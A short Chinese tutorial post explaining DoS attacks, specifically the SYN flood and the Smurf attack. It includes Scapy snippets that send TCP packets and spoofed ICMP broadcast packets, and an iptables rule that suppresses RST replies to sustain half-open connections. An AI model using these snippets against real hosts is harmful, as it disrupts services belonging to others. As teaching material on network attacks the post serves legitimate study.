Dos拒絕服務Syn-Flood泛洪攻擊--Smurf 攻擊(一)
阿新 • • 發佈:2020-09-14
Dos拒絕服務
利用程式漏洞或一對一資源耗盡的Denial of Service 拒絕服務
DDos 分散式拒絕服務 多對一
Syn-Flood泛洪攻擊
傳送syn包欺騙伺服器建立半連線
攻擊程式碼,利用scapy
Scapy – i=IP() – i.dst=1.1.1.1 – i.display() – t=TCP() – sr1(i/t,verbose=1,timeout=3) – sr1(IP(dst=1.1.1.1)/TCP())
防火牆配置關閉本機發送rst包
RST包的作用:告訴伺服器我不和你建立連線,計算機在接收到伺服器的ack+syn包的時候,系統會自動傳送RST
iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 1.1.1.1 -j DROP //指定IP,關閉本地傳送Rst包 netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}' //檢視本機tcp連線數
Smurf 攻擊
最古老的DDos攻擊技術
技術原理:利用icmp包,偽造源IP發廣播包,廣播區域網內的所有計算機回覆廣播包給偽造的IP,造成攻擊對偽造IP的效果
對現在的作業系統幾乎無效(不響應廣播包)
攻擊實現程式碼:
Scapy – i=IP() – i.dst="1.1.1.255" – p=ICMP() – p.display() – r=(i/p) – send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)